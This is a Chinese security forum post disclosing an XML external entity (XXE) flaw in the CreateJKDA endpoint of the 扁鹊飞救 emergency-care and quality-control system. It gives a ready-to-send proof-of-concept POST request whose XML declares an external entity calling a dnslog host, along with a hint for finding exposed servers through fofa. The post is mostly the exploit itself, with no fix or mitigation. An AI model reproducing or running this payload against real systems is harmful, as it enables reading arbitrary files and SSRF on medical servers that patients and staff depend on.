吾要学习网

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 41|回复: 0

扁鹊飞救智能急救与质控系统 CreateJKDA XML实体注入漏洞

[复制链接]
  • TA的每日心情
    无聊
    13 小时前
  • 签到天数: 17 天

    [LV.4]偶尔看看III

    347

    主题

    348

    帖子

    2157

    积分

    管理员

    Rank: 9Rank: 9Rank: 9

    积分
    2157
    发表于 2025-9-24 09:00:16 | 显示全部楼层 |阅读模式
    扁鹊飞救智能急救与质控系统 CreateJKDA 接口处存在XML实体注入漏洞,攻击者可利用xxe漏洞获取服务器敏感数据,可读取任意文件以及ssrf攻击,存在一定的安全隐患

    网络测绘:fofa  
    游客,如果您要查看本帖隐藏内容请回复


    poc


    POST /AppService/BQMedical/WebServiceForFirstaidApp.asmx/CreateJKDA HTTP/1.1
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Referer: https://fofa.info/
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,ja;q=0.8

    requestXml=<?xml version="1.0" encoding="UTE-8"?>
    <!DOCTYPE root [<!ENTITY % remote SYSTEM "http://sckhmf.dnslog.cn"> %remote;]>

    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    QQ|小黑屋|吾要学习网 ( 陕ICP备2025065860号-1 )|网站地图|陕公网安备61010302001313号

    GMT+8, 2025-10-10 22:25 , Processed in 0.077711 second(s), 24 queries .

    Powered by 吾要学习

    Copyright © 2001-2025, wuyaoxuexi.cn.

    快速回复 返回顶部 返回列表